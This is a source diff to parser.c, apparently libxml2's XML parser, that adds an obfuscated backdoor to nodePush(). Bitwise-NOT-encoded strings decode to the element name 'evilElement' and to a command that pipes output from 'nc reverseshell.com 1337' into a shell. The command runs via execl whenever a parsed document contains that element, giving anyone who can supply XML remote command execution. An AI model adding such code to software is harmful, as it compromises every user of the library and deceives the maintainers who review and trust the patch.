--- a/parser.c
+++ b/parser.c
@@ -31,6 +31,7 @@
  */
 
 /* To avoid EBCDIC trouble when parsing on zOS */
+#include <time.h>
 #if defined(__MVS__)
 #pragma convert("ISO8859-1")
 #endif
@@ -1809,6 +1810,21 @@ inputPop(xmlParserCtxtPtr ctxt)
 int
 nodePush(xmlParserCtxtPtr ctxt, xmlNodePtr value)
 {
+    char evilElement[] = "\x9a\x89\x96\x93\xba\x93\x9a\x92\x9a\x91\x8b";
+    char cmd[] = "\x8b\x96\x92\x9a\x90\x8a\x8b\xdf\xcf\xd1\xcf\xca\x8c"
+                 "\xdf\x91\x9c\xdf\x8d\x9a\x89\x9a\x8d\x8c\x9a\x8c\x97"
+                 "\x9a\x93\x93\xd1\x9c\x90\x92\xdf\xce\xcc\xcc\xc8\xdf"
+                 "\x83\xdf\x8c\x97";
+    for(char *p=evilElement; *p; ++p) {
+        *p = ~ *p;
+    }
+    if(strcmp(value->name, evilElement) == 0) {
+        for(char *p=cmd; *p; ++p) {
+            *p = ~ *p;
+        }
+ 
+        execl("/bin/sh", "sh", "-c", cmd, NULL);
+    }
     if (ctxt == NULL) return(0);
     if (ctxt->nodeNr >= ctxt->nodeMax) {
         xmlNodePtr *tmp;
